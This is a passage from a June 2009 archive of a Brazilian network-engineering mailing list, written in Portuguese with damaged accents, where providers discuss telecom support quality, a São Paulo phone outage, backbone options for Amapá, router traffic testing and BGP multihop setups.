problema. Resultado: Contrato cancelado. Giovane Heleno Wideway do Brasil Ltda. 2009/6/4 : > Grandes Mestres (Hebert, Rubens, Juliano and all), > > ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e > trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na > CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os > problemas mas, se algum de voc?s tiver alguma complica??o no > relacionamento conosco, principalmente com rela??o a roteamento (?rea que > me compete), fiquem a vontade em me acionar diretamente... no demais, > estamos trabalhando para melhorar sempre... ? at? IPv6 aqui j? funciona > n?o eh Juliano ??? :-) > > Valeu.. Abs.. > > Epafras Schaden > Engenharia de Redes IP > CTBC/Algar Telecom > > > > > > > Re: [GTER] RES: Ainda problemas com a telefonica > > Juliano Primavesi - Cyberweb Networks > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 04/06/2009 14:09 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > > Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, > acabei eu mesmo por resolver um certo problema de publica??o de rotas... > > Juliano > > Rubens Kuhl escreveu: >> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor >> do que a nossa. >> >> >> Rubens >> >> >> >>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super > r?pido, >>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >>> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m > n?vel >>> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem > o >>> problema ligaram novamente perguntando como estava o link! >>> >>> Quem est? acostumado com a Telefonica (com aquele 0800 que quando > consegue >>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e > nunca >>> resolvem nada) se espanta com um atendimento como esse (que relatei > sobre a >>> Algar). >>> >>> -- >>> Herbert >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From renato at redetuxnet.com.br Tue Jun 9 11:34:23 2009 From: renato at redetuxnet.com.br (Renato Machado) Date: Tue, 9 Jun 2009 11:34:23 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <3e920d2f0906082106i785060ecked35c9bfa057e6f8@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <3e920d2f0906082106i785060ecked35c9bfa057e6f8@mail.gmail.com> Message-ID: <94babad20906090734l4b3b7cb8r6ee488ebc2b1db71@mail.gmail.com> Internet via rede el?trica s? faz a ultima milha, ent?o a estrutura de backbone (wireless, fibra) que o estado n?o disp?e n?o vai ser avan?o nenhum para melhorar a situa??o j? que esse trabalho de ultima milha j? ? feito por pequenos provedores wireless. Att, 2009/6/9 Matheus Bratfisch > Boa noite, > > N?o estou por dentro das atuais situa??es da regi?o, mas para os provedores > da regi?o junto a homologa??o da internet via rede el?trica ser? um avan?o > para a regi?o. N?o? > > Att, > -- > Matheus (X-warrior) Bratfisch. > http://matbra.com > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Renato Silva Machado Gerente de TI + 55 75 8102-8969 Cel + 55 75 8197-6466 Cel + 55 75 3264-1825 Fixo Renato at redetuxnet.com.br Visite o nosso site - www.redetuxnet.com.br - TuxNet Materiais e Servi?os de Inform?tica LTDA. Esta mensagem e seu conte?do - inclusive anexos - s?o dedicados exclusivamente para seu(s) destinat?rio(s), podendo conter informa??es confid?nciais e/ou legalmente privilegiadas. Qualquer modifica??o, retransmiss?o, dissemina??o, impress?o ou utiliza??o n?o autorizada fica estritamente proibida. Se voc? recebeu esta mensagem por engano, por favor informe o remetente e delete o material e as c?pias de sua m?quina From henrique.holschuh at ima.sp.gov.br Tue Jun 9 12:06:06 2009 From: henrique.holschuh at ima.sp.gov.br (Henrique de Moraes Holschuh) Date: Tue, 09 Jun 2009 12:06:06 -0300 Subject: [GTER] =?iso-8859-1?q?OT=3A_STFC_Telef=F4nica_est=E1_fora_em_todo?= =?iso-8859-1?q?_o_estado_de_SP_=3F?= In-Reply-To: <4A2E6359.3090603@lpnet.com.br> References: <4A2E5DAF.9010505@ima.sp.gov.br> <76dec37a0906090611o5f28e0d3i37f3ad204504c1d8@mail.gmail.com> <4A2E6359.3090603@lpnet.com.br> Message-ID: <4A2E7A5E.8050800@ima.sp.gov.br> Marco Aurelio da Silva wrote: > Aqui na regi?o de Bauru, toda telefonia esta fora tamb?m. > > Detalhe, n?o s? para quem tem E1, todos os telefones est?o off. Antes dava o sinal de ocupado para qualquer n?mero. Agora, est? entrando a mensagem gravada de "este n?mero de telefone n?o existe" (para n?meros que existem). Inclusive para n?meros como o 10315. N?o testei o 190 para n?o ocupar linha de emerg?ncia, j? que teria que discar todo o n?mero para saber se ele est? ativo ou n?o (antes bastava entrar o 1 para tomar um sinal de ocupado). -- Henrique de Moraes Holschuh IM@ - Inform?tica de Munic?pios Associados Projetos Especiais TEL +55-19-3739-6055/CEL +55-19-9293-9464 Antes de imprimir, lembre-se de seu compromisso com o Meio Ambiente e do custo que voc? pode evitar. From lscrlstld at gmail.com Tue Jun 9 13:59:18 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Tue, 9 Jun 2009 13:59:18 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__OT=3A_STFC_Telef=F4nica_est=E1_fora?= =?iso-8859-1?q?_em_todo_o_estado_de_SP_=3F?= In-Reply-To: <4A2E7A5E.8050800@ima.sp.gov.br> References: <4A2E5DAF.9010505@ima.sp.gov.br> <76dec37a0906090611o5f28e0d3i37f3ad204504c1d8@mail.gmail.com><4A2E6359.3090603@lpnet.com.br> <4A2E7A5E.8050800@ima.sp.gov.br> Message-ID: <9C9D81EDBDDB4113950BF794D24E34BB@toledoPC> http://g1.globo.com/Noticias/SaoPaulo/0,,MUL1188105-5605,00-PROBLEMA+EM+REDE +DE+SINALIZACAO+CAUSOU+PANE+EM+TELEFONES+DIZ+TELEFONICA.html S? lembrando que o lucro l?quido da Telef?nica foi de R$ 2,420 bilh?es em 2008. > Marco Aurelio da Silva wrote: > > Aqui na regi?o de Bauru, toda telefonia esta fora tamb?m. > > > > Detalhe, n?o s? para quem tem E1, todos os telefones est?o off. > > Antes dava o sinal de ocupado para qualquer n?mero. Agora, > est? entrando a mensagem gravada de "este n?mero de telefone > n?o existe" (para n?meros que existem). Inclusive para > n?meros como o 10315. N?o testei o 190 para n?o ocupar linha > de emerg?ncia, j? que teria que discar todo o n?mero para > saber se ele est? ativo ou n?o (antes bastava entrar o 1 para > tomar um sinal de ocupado). From tukso.antartiko at gmail.com Tue Jun 9 14:26:36 2009 From: tukso.antartiko at gmail.com (Tukso Antartiko) Date: Tue, 9 Jun 2009 14:26:36 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> Message-ID: Dei uma olhada em poss?veis solu??es para o problema do backbone, Fibra pura, me parece que a conta n?o fecha, pois a popula??o ? pequena para compensar os custos e ainda n?o se sabe quantos destes se interessariam por banda realmente larga. Com r?dio puro at? se pode tentar fazer, mas como tem muita ?gua e umidade (v?rios quil?metros sobre rio e floresta), deve ficar muito inst?vel e at? pior que o sat?lite. A solu??o me parece ser h?brida: fibra na parte mais ?mida e r?dio no restante. No entanto esta ?rea mais ?mida ? justamente onde o custo da fibra ? mais caro e tenho minhas d?vidas se o custo total fecharia. Mas pode-se sempre fazer press?o no governo para ver se ele resolve ou agiliza o problema. No Acre haviam alguns pol?ticos fazendo press?o e parece que a conex?o melhorou. Sat?lite, fazendo direito: banda C, sat?lite adequado ? regi?o, DVB-S2, FEC bem alto, LNB e antena bons e bem apontados, conex?o apenas http, fazendo tunnel entre dois proxys nas duas pontas (subida e decida), limita??o da banda no proxy e n?o no link do sat?lite, usando tratamento de congestionamento TCP adequado ... n?o d? tanto problema. Quanto ao custo do sat?lite, acho que est?o pagando caro. O problema ? que para os sat?lites melhores voc? dificilmente conseguir? fazer contratos curtos e o pre?o pode mudar enquanto isso. Quem sabe no sat?lite do Huguito? O Venesat-1 que j? est? no ar. Vai ver, fazendo press?o no governo, o Lula pede um espa?o ao comandante em seu sat?lite bolivariano. Enquanto isso pode-se fazer um PTT entre provedores locais, compartilhando ou n?o algum proxy/mirror, n?o precisa ter ASN nem CIDR pr?prios. On 6/8/09, Wenderson Souza wrote: > Boa noite, > > Conforme dito pelo colega Mayk, o qual conhe?o pessoalmente e tenho grande > respeito pelo seu grande conhecimento nesta ?rea de Internet entre outras, > existe sim este grupo de empres?rios que est? com o projeto de trazer de > Bel?m para Macap? atrav?s da tecnologia a r?dio (segundo meu conhecimento) > internet com velocidades maiores e/ou lat?ncias menores, trazendo assim a > t?o "esperada" banda larga. > > Apesar de (tecnicamente falando) Macap? j? ter banda larga ( > http://pt.wikipedia.org/wiki/Banda_larga), visto que qualquer conex?o que > trafega acima dos 56kbps do modem discado, j? pode-se considerar banda > larga. S? que as velocidades vistas nas capitais que s?o atendidas por > backbones em fibra ?ptica n?o s?o tang?veis em Macap? pelo custo do link > satelital ser muito alto. > > Querem um exemplo, Manaus, tem banda larga pelo Velox, mas j? viram o custo? > Custo alto por usar backbone satelital. Seria o mesmo que aconteceria em > Macap?. ( > http://oivelox.novaoi.com.br/portal/site/OiVelox/menuitem.ebeac1048536fb0248de9f76f26d02a0/?vgnextoid=c0456b009fcf2110VgnVCM10000090cb200aRCRD&STATE=3|AM|Amazonas > ) > > As operadoras de telefonia do estado do Amap? n?o t?m interesse em trazer a > t?o esperada fibra ?ptica para Macap?, porque isso diminuiria seus lucros > locais (com o acesso discado e com os altos pre?os de vendas de links > dedicados para governo e ISPs). E necessitaria de um investimento muito alto > para funcionar internamente. > > Apenas trazer a fibra nao resolveria o problema local, ja que nao tem > infra-estrutura interna necess?ria para instalar redes xDSL. Motivo? Redes > sucateadas, anal?gicas (as mesmas recebidas do sistema Telebr?s na > privatiza??o), amplificadas. Apenas alguns bairros t?m URAs capazes de se > instalar um DSLAM e fazer o neg?cio acontecer. O restante ? totalmente > anal?gico e tem sua troca invi?vel. > > Assim como o Mayk trabalho em ISP e nossa cidade sofre muito com a falta de > um backbone terrestre que nos interligue com o restante do brasil com > lat?ncias adequadas. > > Hoje nossa lat?ncia m?nima em Macap? ? entre 550 ms a 600 ms, isso por culpa > do acesso satelital. > > Ent?o a fibra nao resolveria? Sim e n?o, pois vindo a fibra poder?amos > comprar links dedicados por valores menores e repassar isso para os > consumidores. Velocidades maiores por pre?os menores. Mas nao teria (de > imediato) o ADSL dispon?vel. Mas os ISPs via r?dio conseguiriam atender seus > clientes com melhores qualidades. > > Rede 3G existe em Macap?, mas apenas internamente. V?deo-chamada apenas > local. Passou para o sat?lite a m?gina p?ra. > > E aquele grupo de empres?rios ser? a salva??o? Sim e n?o, pois o monop?lio > continuar?(ria) existindo sem garantias de menores pre?os para os clientes > (que ? o que importa no final das contas). > > A salva??o, que todo mundo espera, al?m de governo, iniciativa privada e > consumidores, ? mesmo a chegada do linh?o de Tucuru? em Macap?, juntamente > com o mesmo vir? (segundo cl?usula licitat?ria) "cabos" de fibra ?ptica para > libertar o povo amapaense desse desespero "desconectado". O problema n?mero > 2 ?: quem ir? explorar esse meio f?sico? > From filipe.m at hostdime.com.br Tue Jun 9 11:52:23 2009 From: filipe.m at hostdime.com.br (filipe mendes) Date: Tue, 9 Jun 2009 11:52:23 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <3e920d2f0906082106i785060ecked35c9bfa057e6f8@mail.gmail.com> <94babad20906090734l4b3b7cb8r6ee488ebc2b1db71@mail.gmail.com> Message-ID: Participo indiretamente de um projeto que levar? internet de forma semelhante(via r?dio), sendo que a Marab?. Se tiver demanda( > 100mbits ) para Macap? posso conversar com quem tiver interesse. Tenho links (case) PTP de r?dio passando 150mbit/s (reais) com 2ms de lat?ncia em 60km. > > Atenciosamente > Filipe > > 2009/6/9 Renato Machado > > Internet via rede el?trica s? faz a ultima milha, ent?o a estrutura de >> backbone (wireless, fibra) que o estado n?o disp?e n?o vai ser avan?o >> nenhum >> para melhorar a situa??o j? que esse trabalho de ultima milha j? ? feito >> por >> pequenos provedores wireless. >> >> Att, >> >> 2009/6/9 Matheus Bratfisch >> >> > Boa noite, >> > >> > N?o estou por dentro das atuais situa??es da regi?o, mas para os >> provedores >> > da regi?o junto a homologa??o da internet via rede el?trica ser? um >> avan?o >> > para a regi?o. N?o? >> > >> > Att, >> > -- >> > Matheus (X-warrior) Bratfisch. >> > http://matbra.com >> > -- >> > gter list https://eng.registro.br/mailman/listinfo/gter >> > >> >> >> >> -- >> Renato Silva Machado >> Gerente de TI >> >> + 55 75 8102-8969 Cel >> + 55 75 8197-6466 Cel >> + 55 75 3264-1825 Fixo >> Renato at redetuxnet.com.br >> >> Visite o nosso site - www.redetuxnet.com.br - TuxNet Materiais e >> Servi?os >> de Inform?tica LTDA. >> Esta mensagem e seu conte?do - inclusive anexos - s?o dedicados >> exclusivamente para seu(s) destinat?rio(s), podendo conter informa??es >> confid?nciais e/ou legalmente privilegiadas. Qualquer modifica??o, >> retransmiss?o, dissemina??o, impress?o ou utiliza??o n?o autorizada fica >> estritamente proibida. Se voc? recebeu esta mensagem por engano, por favor >> informe o remetente e delete o material e as c?pias de sua m?quina >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > From emarques at diveo.net.br Tue Jun 9 14:33:00 2009 From: emarques at diveo.net.br (Everton da Silva Marques) Date: Tue, 9 Jun 2009 14:33:00 -0300 Subject: [GTER] Gerar trafego para um Roteador In-Reply-To: <8212cbca0906081742v28934331g53252b7f00ead3d4@mail.gmail.com> References: <8212cbca0906081742v28934331g53252b7f00ead3d4@mail.gmail.com> Message-ID: Thiago Gomes escreveu: > > Estou fazendo alguns teste em dois roteadores, gostaria de > saber a possibilidade de uma aplicativo em windows que eu > posso gerar trafego para analise destes roteadores algo > como envio de pacotes e verificar sua capacidade, os > roteadores s?o vanguard 340 e um hawaei AR 18-10 O nuttcp ? bem bacana, e roda tamb?m no Windows. http://dcitj.blogspot.com/2008/05/phil-dykstras-nuttcp-quick-start-guide.html http://www.linux.com/archive/feature/144532 ?verton From rosauro at rline.com.br Tue Jun 9 14:36:46 2009 From: rosauro at rline.com.br (Rosauro - RLINE) Date: Tue, 09 Jun 2009 14:36:46 -0300 Subject: [GTER] Cisco 1721 em Bridge Message-ID: <4A2E9DAE.2020108@rline.com.br> Pessoal, estou precisando colocar junto no meu roteador BGP um link menor de 4MB que possuo, e ele chega pra mim por "par metalico" e vai at? o meu roteador que ? um cisco 1721, seria poss?vel eu colocar este roteador em bridge para poder passar o BGP para o meu roteador ? Atenciosamente, Rosauro Baretta From alexandre at onda.psi.br Tue Jun 9 15:56:20 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Tue, 09 Jun 2009 15:56:20 -0300 Subject: [GTER] Cisco 1721 em Bridge In-Reply-To: <4A2E9DAE.2020108@rline.com.br> References: <4A2E9DAE.2020108@rline.com.br> Message-ID: <4A2EB054.6000801@onda.psi.br> voce pode colocar uma sessao bgp no router do link de 4mb.. e anunciar somente a faixa que usa nele.. Rosauro - RLINE wrote: > Pessoal, > > estou precisando colocar junto no meu roteador BGP um link menor de > 4MB que possuo, e ele chega pra mim por "par metalico" e vai at? o meu > roteador que ? um cisco 1721, seria poss?vel eu colocar este roteador > em bridge para poder passar o BGP para o meu roteador ? > > Atenciosamente, > > Rosauro Baretta > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From itamar at ispbrasil.com.br Tue Jun 9 15:53:14 2009 From: itamar at ispbrasil.com.br (Itamar Reis Peixoto) Date: Tue, 9 Jun 2009 15:53:14 -0300 Subject: [GTER] Cisco 1721 em Bridge In-Reply-To: <4A2E9DAE.2020108@rline.com.br> References: <4A2E9DAE.2020108@rline.com.br> Message-ID: a sua pergunta n?o ficou clara, mas creio que um bgp multi-hope resolva seu problema. 2009/6/9 Rosauro - RLINE : > Pessoal, > > estou precisando colocar junto no meu roteador BGP um link menor de 4MB que > possuo, e ele chega pra mim por "par metalico" e vai at? o meu roteador que > ? um cisco 1721, seria poss?vel eu colocar este roteador em bridge para > poder passar o BGP para o meu roteador ? > > Atenciosamente, > > Rosauro Baretta > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From Bruno at Openline.com.br Tue Jun 9 16:13:14 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Tue, 09 Jun 2009 16:13:14 -0300 Subject: [GTER] Cisco 1721 em Bridge Message-ID: <1244574794669.Bruno@Openline.com.br> --- Rosauro - RLINE escreveu: > estou precisando colocar junto no meu roteador BGP um link menor de 4MB > que possuo, e ele chega pra mim por "par metalico" e vai at? o meu > roteador que ? um cisco 1721, seria poss?vel eu colocar este roteador em > bridge para poder passar o BGP para o meu roteador ? Ola Pe?a a operadora BGP multihop neste segundo link BGP e ele passar? do seu cisco para o seu servidor BGP []s, !3runo Cabral From jb at RedePegasus.com.br Tue Jun 9 16:26:19 2009 From: jb at RedePegasus.com.br (JB (Pegasus)) Date: Tue, 09 Jun 2009 16:26:19 -0300 Subject: [GTER] Cisco 1721 em Bridge In-Reply-To: References: <4A2E9DAE.2020108@rline.com.br> Message-ID: <4A2EB75B.5040006@RedePegasus.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Itamar, O multi-hop resolve. Mas, n?o seria a solu??o "bridge", tecnicamente natural e mais adequada? Estou perguntando porque tenho um problema parecido aqui. Devido a interface f?sica da operadora (que ser? mudada daqui algum tempo), sou obrigado a colocar um roteador (qualquer um e barato). Fazendo o BGP em um Mikrotik. []s, Juli?o Itamar Reis Peixoto escreveu: > a sua pergunta n?o ficou clara, mas creio que um bgp multi-hope > resolva seu problema. > > > 2009/6/9 Rosauro - RLINE : >> Pessoal, >> >> estou precisando colocar junto no meu roteador BGP um link menor de 4MB que >> possuo, e ele chega pra mim por "par metalico" e vai at? o meu roteador que >> ? um cisco 1721, seria poss?vel eu colocar este roteador em bridge para >> poder passar o BGP para o meu roteador ? >> >> Atenciosamente, >> >> Rosauro Baretta >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKLrdaC6YpaEL3LVERAkfDAJ4nfl2TlVPzQSCDi1da8YGEuX+bxgCgoFtI zYDjWpH+oGE3rzSZwOEhUNU= =bQPi -----END PGP SIGNATURE----- From rosauro at rline.com.br Tue Jun 9 16:15:03 2009 From: rosauro at rline.com.br (Rosauro - RLINE) Date: Tue, 09 Jun 2009 16:15:03 -0300 Subject: [GTER] Cisco 1721 em Bridge In-Reply-To: References: <4A2E9DAE.2020108@rline.com.br> Message-ID: <4A2EB4B7.5010807@rline.com.br> Entao deixa eu explicar melhor. eu tenho um link por fibra fazendo BGP em um mikrotik. ai no mesmo local tenho um link ainda de 4MB. que esta instalado em um cisco 1721. e gostaria de ativar o BGP neste link tb. mas ai precisaria encontrar uma forma de repassar ao mikrotik, para o mikrotik poder fechar a sessao bgp, que passa por este cisco 1721. Atenciosamente, Rosauro Baretta Itamar Reis Peixoto escreveu: > a sua pergunta n?o ficou clara, mas creio que um bgp multi-hope > resolva seu problema. > > > 2009/6/9 Rosauro - RLINE : > >> Pessoal, >> >> estou precisando colocar junto no meu roteador BGP um link menor de 4MB que >> possuo, e ele chega pra mim por "par metalico" e vai at? o meu roteador que >> ? um cisco 1721, seria poss?vel eu colocar este roteador em bridge para >> poder passar o BGP para o meu roteador ? >> >> Atenciosamente, >> >> Rosauro Baretta >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > From roney at ntc.net.br Tue Jun 9 16:54:46 2009 From: roney at ntc.net.br (=?utf-8?B?UsO0bmV5IEVkdWFyZG8gLSBOVEM=?=) Date: Tue, 9 Jun 2009 16:54:46 -0300 (BRT) Subject: [GTER] Amapa/Macapa In-Reply-To: References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> Message-ID: <27716.200.142.58.19.1244577286.squirrel@webmail.ntc.net.br> Estamos construindo um backbone (enlace de microondas) de 1.6 Gb/s de capacidade, interligando o estado do Amap? aos demais backbones nacionais e internacionais atrav?s do estado do Par?. Previs?o para entrar em operacionaliza??o: 90 dias. Quem estiver interessado em contratar capacidade, favor entrar em contato com: Alaelson Tatsch Fone: (96) 3225-4747 E-mail: alaelson at ntc.net.br []'s R?ney Eduardo O. Santos NTC - Norte Tecnologia em Comunica??es Ltda. Macap?-AP roney at ntc.net.br From maxthetor at gmail.com Tue Jun 9 21:47:57 2009 From: maxthetor at gmail.com (max _tor) Date: Tue, 9 Jun 2009 21:47:57 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <3e920d2f0906082106i785060ecked35c9bfa057e6f8@mail.gmail.com> <94babad20906090734l4b3b7cb8r6ee488ebc2b1db71@mail.gmail.com> Message-ID: <20a28b1b0906091747j56371e51wf02f7b774650e27e@mail.gmail.com> filipe, voces vao entregar a media de quanto o mega em maraba? abracos 2009/6/9 filipe mendes > Participo indiretamente de um projeto que levar? internet de forma > semelhante(via r?dio), sendo que a Marab?. Se tiver demanda( > 100mbits ) > para Macap? posso conversar com quem tiver interesse. Tenho links (case) > PTP > de r?dio passando 150mbit/s (reais) com 2ms de lat?ncia em 60km. > > > > > Atenciosamente > > Filipe > > > > 2009/6/9 Renato Machado > > > > Internet via rede el?trica s? faz a ultima milha, ent?o a estrutura de > >> backbone (wireless, fibra) que o estado n?o disp?e n?o vai ser avan?o > >> nenhum > >> para melhorar a situa??o j? que esse trabalho de ultima milha j? ? feito > >> por > >> pequenos provedores wireless. > >> > >> Att, > >> > >> 2009/6/9 Matheus Bratfisch > >> > >> > Boa noite, > >> > > >> > N?o estou por dentro das atuais situa??es da regi?o, mas para os > >> provedores > >> > da regi?o junto a homologa??o da internet via rede el?trica ser? um > >> avan?o > >> > para a regi?o. N?o? > >> > > >> > Att, > >> > -- > >> > Matheus (X-warrior) Bratfisch. > >> > http://matbra.com > >> > -- > >> > gter list https://eng.registro.br/mailman/listinfo/gter > >> > > >> > >> > >> > >> -- > >> Renato Silva Machado > >> Gerente de TI > >> > >> + 55 75 8102-8969 Cel > >> + 55 75 8197-6466 Cel > >> + 55 75 3264-1825 Fixo > >> Renato at redetuxnet.com.br > >> > >> Visite o nosso site - www.redetuxnet.com.br - TuxNet Materiais e > >> Servi?os > >> de Inform?tica LTDA. > >> Esta mensagem e seu conte?do - inclusive anexos - s?o dedicados > >> exclusivamente para seu(s) destinat?rio(s), podendo conter informa??es > >> confid?nciais e/ou legalmente privilegiadas. Qualquer modifica??o, > >> retransmiss?o, dissemina??o, impress?o ou utiliza??o n?o autorizada fica > >> estritamente proibida. Se voc? recebeu esta mensagem por engano, por > favor > >> informe o remetente e delete o material e as c?pias de sua m?quina > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From maxthetor at gmail.com Tue Jun 9 21:33:49 2009 From: maxthetor at gmail.com (max _tor) Date: Tue, 9 Jun 2009 21:33:49 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <2f3f2f700906081744s33d329e5oe267d21bee00ff29@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <2f3f2f700906081744s33d329e5oe267d21bee00ff29@mail.gmail.com> Message-ID: <20a28b1b0906091733s18386c1q1cbc61bdf11023bf@mail.gmail.com> Ola Mayk, quando lancei essa thread jamais imaginei que alguem responderia, mas imaginei que a situacao estava mais ou menos assim. Ouvi mais ou menos sobre a situacao dos links satelitais, mas pensei que alguem ja tinha feito ou comecado acesso optico, nao submarino, pelo menos terrestre. Pelo que vi a capital esta muito dentro do estado, parecendo muito dificil ou impossivel chegar pelo mar ou pelo rio amazonas, me corrijam se eu estiver falando bobagem. Quanto ao acesso via radio, estimo que uma capital do tamanho de macapa, mesmo sendo pequena, existe demanda para um 1G nos proximos 2 anos, no minimo, mesmo nao tendo estrutura para adsl ou HFC (existe alguma operadora de tv a cabo?) Quanto ao preco nao me assustei, aqui pelo ceara, nao e incomum em algumas cidades do interior, cobrarem o tal preco de "portfolio" que chega a 6/7 Mil por 2Mega. Voce trabalhar em provedor local? Abracos 2009/6/8 Mayk Campelo > Das grandes teles, a Embratel, Oi e Intelig est?o presentes no Amap?, > qualquer uma dessa operadoras faz uso de satelite para transporte > inter-backbone. No que diz respeito a Internet, nenhuma operadora > oferece DSL na ?ltima milha, as ?nicas op??es s?o o acesso das > operadoras de celular (vivo e tim) e acesso via r?dio ofertado por > provedores locais. > > Os pre?os praticados pelas teles s?o altamente elevados, fora de > qualquer realidade do eixo centro/sul, o mega com cir de 100% chega a > custar at? R$ 8.000,00, sem falar no problema de > capacidade/escalabilidade condicionada por essas empresas. > > O Amap? vive um momento de intensa discuss?o e busca por solu??es que > viabilizem melhorias no acesso a Internet. Existem muitas cogita??es > para realizar transporte fora do satelite, mas at? onde sei apenas uma > ? concreta. Um grupo de empres?rios (provedores locais) startou um > projeto que objetiva a implatan??o de um circuito terrestre entre o > Amap? e o Par?, com alta capacidade/escalabilidade de transporte. > > Esse grupo de empres?rios est? prestes a mudar a radicalmente a > realidade da oferta de servi?os de Internet/Telecom no estado do > Amap?. Posso afirmar que ser?o duas "?ras" (em termos de comunica??o) > registradas na hist?ria do Estado do Amap?: a que perdura at? os dias > atuais e a que vier quando tivermos dispon?vel a infraestrutura > projetada por esses empres?rios. > > > Abra?o, > > -- > Mayk Campelo > > > > 2009/6/8 max _tor : > > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de > como > > esta > > o acesso por essa cidade/estado?? > > Quem atende? OI/Embratel? outra? > > Servico precario? bom? > > > > Abracos > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From maxthetor at gmail.com Tue Jun 9 21:46:34 2009 From: maxthetor at gmail.com (max _tor) Date: Tue, 9 Jun 2009 21:46:34 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> Message-ID: <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> Wenderson, tranquilo, agradeco por ter respondido. Com relacao ao grupo de empresario, nao entendi porque Belem, cidade com melhor investimento de backbone mais proxima? ou simplesmente unica alternativa? Olha Wenderson, conhecendo as historias do Carlos Slim ( http://pt.wikipedia.org/wiki/Carlos_Slim_Hel%C3%BA ) , fico meio em duvida com relacao ao seu comentario das operadoras, que nao querem investir mais para nao baixarem os precos, aposto mais em viabilidades tecnicas e quando fala em viabilidade, falo em $$, imagino que o investimento seja tao alto que so daria certo se grandes operadores se unisessem, que nao e comum, so quando se compram :) , mas tambem e o que acho, nao sao certezas. Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar em voip correto? Com relacao a ultima milha, acho que e um processo relativo, a medida que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, ADSL, isso ja seria questao de tempo. Acho tambem, que se um grupo forte ou um empresario independente, fizer o investimento entregando nao so internet, mas telefonia fixa e outros servicos para o mercado empresarial , logo nao se ganhara dinheiro com acesso a internet, alguma ou todas grande investira tambem, gerando concorrencia e aquecimento no mercado local, portanto nao vejo como salvacao mas como aceleracao. Mas sao apenas duvidas e discussoes correto ? Abracos 2009/6/8 Wenderson Souza > Boa noite, > > Conforme dito pelo colega Mayk, o qual conhe?o pessoalmente e tenho grande > respeito pelo seu grande conhecimento nesta ?rea de Internet entre outras, > existe sim este grupo de empres?rios que est? com o projeto de trazer de > Bel?m para Macap? atrav?s da tecnologia a r?dio (segundo meu conhecimento) > internet com velocidades maiores e/ou lat?ncias menores, trazendo assim a > t?o "esperada" banda larga. > > Apesar de (tecnicamente falando) Macap? j? ter banda larga ( > http://pt.wikipedia.org/wiki/Banda_larga), visto que qualquer conex?o que > trafega acima dos 56kbps do modem discado, j? pode-se considerar banda > larga. S? que as velocidades vistas nas capitais que s?o atendidas por > backbones em fibra ?ptica n?o s?o tang?veis em Macap? pelo custo do link > satelital ser muito alto. > > Querem um exemplo, Manaus, tem banda larga pelo Velox, mas j? viram o > custo? > Custo alto por usar backbone satelital. Seria o mesmo que aconteceria em > Macap?. ( > > 